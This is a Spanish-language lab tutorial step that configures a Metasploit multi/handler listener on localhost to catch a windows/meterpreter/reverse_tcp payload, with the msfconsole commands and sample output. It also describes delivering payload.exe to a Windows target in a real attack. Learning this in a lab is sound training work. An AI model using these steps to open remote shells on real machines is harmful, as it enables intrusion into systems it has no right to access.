Crear un listener en msfconsole para capturar la conexión
En este paso, configurará un listener para manejar la conexión del payload que acaba de crear. Un payload es inútil a menos que tenga algo de su lado para "capturar" la conexión inversa que realiza. Para esto, utilizaremos msfconsole, la interfaz principal del Metasploit Framework.
Primero, inicie msfconsole. Usar la opción -q hace que se inicie silenciosamente sin mostrar el banner, lo cual es más limpio.
msfconsole -q
Su prompt cambiará a msf6 >. Ahora, necesita configurar un handler para escuchar la conexión entrante. La configuración del handler debe coincidir exactamente con la configuración que utilizó para generar el payload.
-
Utilice el módulo exploit/multi/handler. Este es un handler genérico para conexiones entrantes.
use exploit/multi/handler
-
Establezca el payload para que coincida con el que generó.
set payload windows/meterpreter/reverse_tcp
-
Establezca LHOST a la misma dirección IP.
set LHOST 127.0.0.1
-
Establezca LPORT al mismo puerto.
set LPORT 4444
-
Finalmente, ejecute el listener.
run
msfconsole mostrará ahora un mensaje indicando que el listener se ha iniciado.
[*] Started reverse TCP handler on 127.0.0.1:4444
En este punto, el listener está activo y esperando. En un ataque real, transferiría payload.exe a un objetivo de Windows y lo ejecutaría. Cuando se ejecute, se conectaría a este listener y usted obtendría una sesión de Meterpreter. Dado que no tenemos una máquina Windows objetivo en este laboratorio, no veremos una conexión. El objetivo aquí es aprender el proceso completo de generación de un payload y la configuración de su listener correspondiente.
Para salir del listener, presione Ctrl + C. Para salir de msfconsole, escriba exit y presione Enter.
exit